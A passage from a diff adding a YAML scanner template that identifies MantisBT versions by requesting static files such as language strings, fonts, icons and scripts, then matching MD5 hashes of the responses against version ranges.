2.24.3 + dsl: + - "(\"ed2e889dac809bbe83270b09cf568424\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_lb.txt" + + matchers: + - type: dsl + name: 1.3.4 - 2.10.1 + dsl: + - "(\"249a0ce7b31ae3f74f8524bf384b2007\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"a583a210fbd9f5d9d0bf105c9ef16e73\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.10.1 + dsl: + - "(\"50e7438f40368d27e166d6bbe2684499\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"c3fe9394b7d58508f66820b63a986430\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9db00d02ba3a22e15ddc7c79139d9298\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"bf11ca473d9d9a23a6a73d42e75cc891\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"585d230f0320afe4a5726ef66c2c5580\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"89dd33f0079339e7b085ba14dd1b69a6\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"c56e1b73a672cdba9f1e46e7c43276bc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b5ca4116651515c4b08756f05127f012\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"3ba8668f09056bc256b40107dd7655c5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fb8a11aa872aaf252839cedf7c8b7ae2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_lki.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"cc69014c4f3c309ca4fd29bd38b9650a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ml.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"94ffcfcad7cc39f975586bb237a20d55\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_te.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"437903040f931943d527cfcefec17124\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"2476461935b7617a6297a9c41f1dc362\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lki.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f78db1de766a5aa41823365451b0f945\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_fa.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"7a6f9032b30b9bee27f830a055fd0087\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lez.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"4889d5565075d1884fdcf5d8f5064c25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zh-hk.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.24.3 + dsl: + - "(\"9db7d3ed1d0f3e5665a16d0b9c898890\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_aeb.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"45ab5b3d2d76438d9f500c22df4bfcbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fed17663a6f39f44237525b877e9418e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/RjgO7rYTmqiVp7vzi-Q5UYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"640a51fc85d8f52e6ca6919e76b6231d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/dDzx7Qrpf6EUDCpeO-RralKPGs1ZzpMvnHX-7fPOuAc.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8a06c170adbf19e0dffcbe868719e6ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/xozscpT2726on7jbcb_pAoX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1e86e60675a363ff89aa6d236d97781e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/59ZRklaO5bWGqF5A9baEEYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"263e2fde7e3f1a4dfbfd6e40de4ced03\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/rBHvpRWBkgyW99dXT88n7wsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"3bcb2e4e644c6c2c93e6b9e65132e39b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/K88pR3goAWT7BTt32Z01m4X0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"7cae1e36ddd5d05afd1e023e17280701\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/u-WUoqrET9fUeobQW7jkRYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"43cb98c9f37710db018c1739d9d1a91b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/NX1NravqaXESu9fFv7KuqgsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"161651057d81a4076c609fc86b9e1078\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/w5uwZf-mdghB6LOAw_y9AFKPGs1ZzpMvnHX-7fPOuAc.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"3813954e62ff3df394ccf95ed2ceeceb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/cJZKeOuBrn4kERxqtaUH3ZBw1xU1rKptJj_0jans920.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8e3f978a77d191a9e7f94ff9e7090085\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/gFXtEMCp1m_YzxsBpKl68gsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"8c3e2934e7ead5fe718acb8e35878688\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/zhcz-_WihjSQC0oHJ9TCYAzyDMXhdD8sAj6OAJTFsBI.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"cdd5aad3fd6aaa1b80d5119924cd0d52\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/HUuNgGR31mqIHE6zs0BlBgLUuEpTyoUstqEm5AMlJo4.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"ce0c9ae08840a0b43bccb9f5a86e155d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/SKK6Nusyv8QPNMtI4j9J2wsYbbCjybiHxArTLjt7FRU.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"1383e1a4581a5fedece636cfec8854fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/LWCjsQkB6EMdfHrEVqA1KYX0hVgzZQUfRDuZrPvH3D8.woff2" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"f959142bf8b8a8131cf4ab69c40b8bd6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ka.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"3f8b6cd21447bfa0d80b707491a46a82\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_fa.txt" + + matchers: + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"fcbf98c8267756c91b3bc45baba6bfa8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bn.txt" + + matchers: + - type: dsl + name: 2.10.0 - 2.11.1 + dsl: + - "(\"a47e6f2aeeec218e460fa7c2ade0ce53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_mwl.txt" + + matchers: + - type: dsl + name: 2.10.0 - 2.11.1 + dsl: + - "(\"e84ba2159b76fce0ffa635aea71b8760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/timetracking.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.9.1 + dsl: + - "(\"63fb68d786ae495ce556ddc089950022\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.24.3 + dsl: + - "(\"3fd67c131042b906bd341ce045165782\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/README" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"f74b555082b8bcbd25909dddd970bd26\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/adodb-time.zip" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.7 + dsl: + - "(\"e8586f60e93359dd15c15832ab100210\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"379215fb2071d003559034f77bcdfaea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"61cfe21a396d42a8a8f0a86609a03e9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"fdcdcc6aec537b6ae2bd662dd98ddfaa\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"9a4a3d0b657d05a4855cb81cb78291ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_italian_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"d7521a657bbee821a594919ff4c48f71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"6a8ae46f90949556aab4a319ee9bc278\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovene_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"510c5c725d54414fbb92c7e5c4b3c651\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish_utf8.txt" + + matchers: + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"20ccc365263d4514f9b613314d0aaf0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/unknownicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b7ea9920fbf16b2d10b36b5d6c47a440\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/excelicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d8b116d5a73fb9576799264d6a073396\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/zipicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"e47b673f360c57be8437841fdea7351c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pdficon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9cb8ae8481d24743d57e81a2280ffaae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/wordicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"31f4faaa0dd89d7f28fcf1ba068437f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/word2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"0c2af6ba5756409ce9a66dab8b3a5ae5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/texticon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"f3fa1d34ae216911d245672e3db9235b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/htmlicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"338ca0065c22f2a9f699a46c5bf1e7ab\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/fileicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a8cde8384a414838f99be196e53ae039\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pdf2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"1a56758ef0868ca9ace5f0d78d051263\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/gificon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b67bed81d8bbea1e5590547ef85e1aa0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mailicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"098b7636e4f7d4bcd8f55e441e7d3342\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/pngicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"4c2b6a95930efc2a58c99c87aca61851\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/jpgicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"330542d19122885a098aec151a68609a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ieicon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"800d2395bd737075d8e67779d304d3e5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/excel2icon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"36d7ad1391984bec980c28ab89bb64af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/ppticon.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"dbd0042c18070d1d2e5c7e29776b5e53\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/drivers/adodb-sqlite.inc.php.bak" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.6 + dsl: + - "(\"acfd5053382a3537bf30ff30b0fd6f29\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_bulgarian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"539aaddb2dfb50a8b696bf1434a1fea7\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"69a72e0af1f00e831e9e2d3da953040c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_polish_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9b159e035369667dfe1322c08fd88fcc\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"050730aaca55736d2008231a1ee3f327\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ukrainian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"8e3774bf377f85ff8ab6a6ca594b19f9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"db7f51988af0e213e4977a3e69440d64\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_danish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"143d1841ba23f7e706d7ff3bfaf76d4d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"bce731e525a48e242b851e8e90810983\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_standard_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"73a63a116a7e04f5b5ed67dcf958b5b7\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"36b7de97e2939313ac923a09be61c882\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_hungarian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"46a4bfa2572fb5f277988e98b987d08d\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"060a0b8a99b8f1d1572f4f64b7790edd\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"f2cd96a215bb3728f320d2746903ccfa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_french_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"afaa84f850809cc21a23fd120dd8efc4\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"53663e49b472df11f0784871d319018f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"26ecb6a97311ef038ca40ef9fd04f24d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1db4819a335c4b1d1404d7573d15cc9e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"5f9e733855a162996222d247e1d137de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_brazil_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9d1c90d8dd32dcc42c4cc79164d47da6\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"6ab8c0ccccb50a0dbb3e28f77d4c1ebc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_icelandic_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"5022495c46b3dd014d6ca85468c35da5\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"f42698512a598c79c1a48cd33ed650f5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_finnish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"e81617bba67e1b359f9b6884888b0ccf\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"8cdfc486ee02afea843f0b133c743693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_russian_1251.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2f4f9910368fee6158d33c0e9994a906\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"dda05b19130721b286fb659135e9308d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lithuanian_1257.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"98c2dce369efc91db12b0decda68ec6c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"1d9a3f84e1b6cac7d79e10f2976650fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_catalan_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"14392a88739c0edccd9f5e7d3bb62f85\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"40422c391c62ed889ca88c473defcc0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovak_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"b8a0a03881d0b20db4a2b3fe7078a22d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"d60aaf3fce2fa55988ee39b35340ed75\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_serbian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"31bdc7c28183c4f6bcd502a14b443e8f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"9c834dec4037c257e46878a020b232fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_korean_euc-kr.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0d23d31d5c136dea71aac3a61ceceaf1\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"69e5a4d596b5d5e91bcb450d32827875\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional_big5.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"bff23728d5d14f0c73ade3dd5831d9af\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"467b5d702129c78de5e8a6467617a7c8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swedish_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"b1abc04f4bb8191a0db2769a62241f1a\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"28751940c9338d5822ba4b3c6678d53d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_latvian_1257.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"f3ca33210fd6ce0aa827b321265bad41\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"d06a3c02094e30bd44fd411a1e63bab4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_croatian_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"2c945333f7d334d5bb08e436ff3be14e\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"e1a7ffeb0eb1c2b2a4f4f4e67140ad6c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_estonian_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"32afb713876910b00d9ff31f660e8ce3\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"5ea5e4b80e6dde0b7204cdcd13773ac8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german_8859-1.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"bbcd53eb0aa5f8c129885c422bbcc358\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"0fe53871001a9024d537524dea489103\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_simplified_gb2312.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"480a9ad7b1b6d2129fcd9e3887f32941\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"c6200032376438a0ffebd21d37d0d74e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german_eintrag.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9c791797c5741e587e4bb3dfde5c2411\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"32d484f6454a29c257d836044d35aa8e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_turkish_8859-9.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"69fa68d9b79e63940a22bb3da3d6ba0d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"2ffef0a07b4d33abb194375fb9938619\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovene_8859-2.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"47fd04c544efbead2d96b8e3a26001ae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_norwegian_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"6e94e6d4d8e4ada5c5172c28cffd7ca9\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"01c6cf1263d076e69bf3b6eadc07b342\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_dutch_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"501564f941193f49064ee7e8267d8a52\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"f6d828eb6c4381e87e434295d68247ae\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_spanish_8859-15.txt" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"7269163b39bded3230dc6bad8cb69bf0\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.6 + dsl: + - "(\"dec03acd68260dfed46c5aa475a29378\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"18bf57d74202c95933f1e6f7516d912a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/rss.gif" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"f8afe1dc253c1f4d7ba707b7adc4254a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"94f23d58a0fcbd4facf9409f32930bd4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"443e52678f99abd9bfb9a06733446d92\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/builder.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"09bcb24e92ed01f582f45c14cec2b47f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/prototype.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/effects.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9739220ad1d1903a67c669d0028b3573\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"2379e43931989fba9c4837631ff36493\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/license.html" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"922a7dcc62938e0d7ff7c40586503f46\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/slider.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"b269a3bc58a705e7971a991df421d512\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e81bcb5a62616ff00551ffb3abfdae6d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/MIT-LICENSE" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/projax/controls.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"245572dbb90f531a5a07ac1bb0646e39\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"46811ee79796d2345bea2308475d1ec9\" == md5(body))" + + - method: GET + path: 